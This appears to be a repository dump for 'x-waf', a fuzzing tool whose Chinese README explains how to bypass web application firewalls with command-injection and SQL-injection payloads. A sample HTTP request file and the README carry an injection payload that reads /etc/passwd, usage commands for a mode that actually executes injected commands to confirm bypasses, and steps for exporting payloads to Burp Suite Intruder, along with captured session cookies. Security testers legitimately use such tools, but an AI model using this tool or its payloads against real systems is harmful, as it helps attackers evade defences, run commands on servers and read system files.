├── .gitattributes ├── chatin-cmdchop.http └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | linux_x_waf filter=lfs diff=lfs merge=lfs -text 2 | mac_x_waf filter=lfs diff=lfs merge=lfs -text 3 | mac_amd64_x_waf filter=lfs diff=lfs merge=lfs -text 4 | -------------------------------------------------------------------------------- /chatin-cmdchop.http: -------------------------------------------------------------------------------- 1 | POST /demo/detect/ HTTP/1.1 2 | Host: cmdchop.chaitin.com 3 | accept: application/json, text/javascript, */*; q=0.01 4 | accept-language: zh-CN,zh;q=0.9,en;q=0.8 5 | content-type: application/json 6 | cookie: _ga=GA1.2.212169703.1725506930; _ga_PNVRK9GRJ2=GS1.2.1725527773.2.1.1725529516.0.0.0; user_id=f62aa452-d92a-405a-9295-49aba0ed6d47; cid=dea7646d-7542-432f-858f-c745914a1e73; mid=c0b990d0-a3dc-455c-9f66-bac94da0b098 7 | origin: https://cmdchop.chaitin.com 8 | priority: u=1, i 9 | referer: https://cmdchop.chaitin.com/demo/ 10 | sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99" 11 | sec-ch-ua-mobile: ?0 12 | sec-ch-ua-platform: "macOS" 13 | sec-fetch-dest: empty 14 | sec-fetch-mode: cors 15 | sec-fetch-site: same-origin 16 | user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 17 | x-requested-with: XMLHttpRequest 18 | Content-Length: 50 19 | 20 | {"type":"urlpath","payload":"/?p=%{{cat /etc/passwd}}%"} 21 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 一个基于fuzz的waf绕过测试工具,当前支持命令执行、SQL注入绕过。后续会支持更多绕过方式、攻击类型。 2 | 3 | ``` 4 | Usage: 5 | ./x-waf -target [flags] [command] 6 | ./x-waf [command] 7 | 8 | Available Commands: 9 | cmd fuzz cmd injection 10 | completion Generate the autocompletion script for the specified shell 11 | help Help about any command 12 | sql fuzz sql injection 13 | 14 | Flags: 15 | --debug-file-path string specify request response log file path 16 | --fuzz-count int specify max fuzz times (default 10000000) 17 | -h, --help help for ./x-waf 18 | --justOutPutPayload just output payload to payloads.txt 19 | --log-level string specify log level, default is info (default "info") 20 | --target string specify the request file path 21 | --target-https specify whether the request is https protocol (default true) 22 | --target-mark string specify the request fuzz position mark (default "%{{.*}}%") 23 | --waf-block-regex string specify waf block regex 24 | --waf-block-rsp-status-code int specify waf block response status code (default 403) 25 | 26 | Use "./x-waf [command] --help" for more information about a command. 27 | ``` 28 | 29 | # 使用步骤 30 | 1、准备需要绕过的HTTP请求文件,例如:test.http 31 | 32 | ``` 33 | POST /demo/detect/ HTTP/1.1 34 | Host: cmdchop.chaitin.com 35 | accept: application/json, text/javascript, */*; q=0.01 36 | accept-language: zh-CN,zh;q=0.9,en;q=0.8 37 | content-type: application/json 38 | cookie: _ga=GA1.2.212169703.1725506930; _ga_PNVRK9GRJ2=GS1.2.1725527773.2.1.1725529516.0.0.0; user_id=f62aa452-d92a-405a-9295-49aba0ed6d47; cid=dea7646d-7542-432f-858f-c745914a1e73; mid=c0b990d0-a3dc-455c-9f66-bac94da0b098 39 | origin: https://cmdchop.chaitin.com 40 | priority: u=1, i 41 | referer: https://cmdchop.chaitin.com/demo/ 42 | sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99" 43 | sec-ch-ua-mobile: ?0 44 | sec-ch-ua-platform: "macOS" 45 | sec-fetch-dest: empty 46 | sec-fetch-mode: cors 47 | sec-fetch-site: same-origin 48 | user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 49 | x-requested-with: XMLHttpRequest 50 | Content-Length: 50 51 | 52 | {"type":"urlpath","payload":"/?p=cat /etc/passwd"} 53 | ``` 54 | 55 | 2、将payload的位置用%{{.*}}%标记,例如: 56 | 57 | ``` 58 | {"type":"urlpath","payload":"/?p=%{{cat /etc/passwd}}%"} 59 | ``` 60 | 61 | 3、运行命令: 62 | 63 | ``` 64 | ./x_waf --target test/chatin-cmdchop.http --waf-block-regex payload cmd --fuzz-cmd-mode real 65 | ``` 66 | 67 | --fuzz-cmd-mode real 会实际执行命令,验证payload是否有效,当前只支持查看/etc/passwd文件内容 68 | 69 | --fuzz-cmd-mode mock 会解析命令,验证payload是否有效,支持任意命令 70 | 71 | --waf-block-regex payload 指定waf拦截时页面响应的匹配内容,支持正则表达式 72 | 73 | 4、查看bypass结果: 74 | 75 | ``` 76 | cat result.txt 77 | ``` 78 | 79 | # 和burpsuite配合使用 80 | 当程序遇到各种奇怪的报错时,你可以选择使用x-waf只生成payload,然后用burpsuite intruder模块来遍历发包,根据响应状态码或者响应长度来判断是否拦截。 81 | 82 | ``` 83 | ./x --justOutPutPayload --target test/chatin-sqlchop.http sql --fuzz-sql 'select user from mysql.user' --fuzz-count 1000 84 | ``` 85 | 86 | --justOutPutPayload 导出payload到payloads.txt文件 87 | 88 | # 注意事项 89 | 如果目标不是https,就加`--target-https=false`参数 90 | 91 | # 运行截图 92 | image 93 | 94 | # 交流群 95 | image 96 | 97 | 98 | --------------------------------------------------------------------------------